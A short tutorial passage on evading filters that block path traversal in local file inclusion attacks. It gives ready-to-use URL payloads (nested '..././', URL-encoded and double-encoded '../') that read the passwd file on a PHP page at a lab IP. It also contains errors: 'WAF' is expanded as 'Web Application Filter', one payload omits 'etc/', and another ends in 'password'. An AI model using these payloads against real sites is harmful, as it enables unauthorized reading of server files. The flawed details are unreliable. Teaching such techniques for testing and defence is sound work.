Developers, who are aware of the risks of LFI, sometime add functions that will filter the entries.
They detect and remove the ../ and the / in the filename
. This kind of filter is called a Waf: Web Application Filter.

It is possible to bypass these filters in several ways:

• By providing the sequences of characters that will be filtered out: ..././ once filtered becomes ../
  http://10.10.10.11/index.php?page=..././..././..././..././passwd
  
  
• Using url encoding:
  %2e%2e%2f instead of ../
  %2f instead of /
  http://10.10.10.11/index.php?page=%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
  
  
  
• Using a double url encoding:
  ../ => %2e%2e%2f => %252e%252e%252f
  http://10.10.10.11/index.php?page=%252e%252e%252f%252e%252e%252fetc%252fpassword
  
  

Browsers could interpret the encoded characters or even re-encode them. It is usually better to set the desired URL thanks to a curl command or modify/replay using an HTTP proxy.